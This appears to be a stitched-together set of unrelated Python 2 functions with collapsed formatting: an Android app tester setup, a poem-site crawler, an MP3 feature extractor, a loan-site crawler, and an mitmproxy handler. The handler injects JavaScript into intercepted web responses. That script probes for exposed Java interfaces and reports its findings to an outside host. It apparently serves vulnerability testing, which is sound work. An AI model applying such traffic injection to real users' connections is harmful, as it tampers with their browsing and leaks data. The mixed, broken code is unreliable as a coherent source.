def __init__(self): self.get_apk_from_manager() self.trigger = Trigger.get_trigger_for(self.get_filter_tag(), self.get_package_name(), self.get_description()) self.reporter = Reporter.get_reporter_for(self.get_filter_tag(), self.get_package_name(), self.get_description()) self.analyzer = Analyzer.get_analyzer_for(self.get_filter_tag(), self.get_package_name(), self.get_description()) self.emulator = Emulator.get_emulator_for(self.get_filter_tag(), self.get_package_name(), self.get_description()) self.error_queue = multiprocessing.Queue() self.setup_device()
def handle_response(self, flow): print "request path is %s " % flow.request.path # If it's injectable and it's not the injected request requested_site = flow.request.headers["Host"][0] if flow.request.scheme.endswith("http") and requested_site.find("www.fundacionsadosky.org.ar") == -1: visited_url = base64.b64encode(requested_site + flow.request.path) #taken from www.droidsec.org/tests/addjsif/ script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}''' content_type = flow.response.headers.get("Content-Type") if not content_type: content_type = flow.response.headers.get("Content-type") if content_type and "text/html" in content_type[0]: with decoded(flow.response): # automatically decode gzipped responses. if flow.response.content: try: response = flow.response.content print "Response is "+response root = lxml.html.fromstring(response) if root.find('.//*') is not None: print "TRIED MODIFYING /html " + requested_site+ flow.request.path # is HTML, use lxml to insert to head, body or script append_in = root.find('.//head') if append_in is None: append_in = root.find('.//body') elif append_in is None: append_in = root.find('.//script').getparent() else: append_in = root script = lxml.html.fromstring('<script>' + script + '</script>') if append_in is not None: append_in.append(script) flow.response.content = lxml.html.tostring(root) except: print "There was a problem parsing the html response, skip it" # mimetype may be application/javascript or text/javascript elif content_type and "javascript" in content_type[0]: with decoded(flow.response): # automatically decode gzipped responses. print "TRIED MODIFYING /javascript " + requested_site + flow.request.path # is searching for library .JS (both cases sensitive) or JQUERY flow.response.content = script.encode("utf-8") + flow.response.content Analyzer.handle_response(self,flow)
def poem_type_poem_list_craw(self): types = self.db.get_poem_types() for i in types: j = 1 while True: page_url = i['url'] + "&page=" + str(j) # 入库 self.db.insert_url(page_url, 3) # 判断是否分析过 if self.db.url_analyzed(page_url): j += 1 continue else: content = Downloader.get_html(page_url, 'poemlist') if content: # 分析诗的列表 poems = Analyzer.get_poems_from_list_page(content) if poems: # 入库 self.db.insert_type_poems(i['id'], poems) self.db.update_url(page_url) print '%d: %s' % (j, page_url) j += 1 else: if Analyzer.check_poem_list_last_page(content): # 最后一页 break else: print u'分析失败' self.db.insert_error('analyze_poem_list_error', 3, 'reason', page_url) # 错误入库:analyze_poem_list_error else: print u'获取页面诗词列表错误' self.db.insert_error('get_poem_list_error', 2, 'reason', page_url)
def poem_type_crew(self): url = 'http://www.haoshiwen.org/type.php' content = Downloader.get_html(url, 'poemlist') if content: result = Analyzer.get_poem_types(content) k = 1 for i in result: # 只处理类型 if i[0] == u'类型': for j in i[1]: self.db.insert_poem_types(k, i[0], j[0], j[1]) print '\t' + j[0] k += 1
def mp3_to_feature_vectors(self): #checks for and removes existing feature vector files os.chdir(outputpath) fileList = glob.glob("*.csv") for f in fileList: os.remove(f) #new generic Analyzer and dataflow theanalyzer = Analyzer(self.SAMPLERATE, self.featureList, True) df = theanalyzer.dataFlowCreator() failed_mp3 = [] failed_dir = [] i = 0 for path in self.mp3dirs: logging.info("Changed path: %s"%(path)) for dirpath, dirnames, filenames in os.walk(path): for filename in [f for f in filenames if f.endswith(".mp3")]: os.chdir(dirpath) if theanalyzer.process_mp3(filename, df) == False: failed_mp3.append(filename) i += 1 os.chdir(syspath) print "wrote %d files." % i
def __get_buy_loans2(self, url): domain = PaipaiDai.get_domain(url) content, cache = Server.get(url, cache=False, use_cookie=True) if content: my_loans, next_page = Analyzer.get_my_loan_list(content) self.db.insert_my_loans(my_loans) print url if next_page: if not cache: time.sleep(2) next_page = os.path.join(domain, next_page.lstrip('/')) self.__get_buy_loans2(next_page) else: time.sleep(2)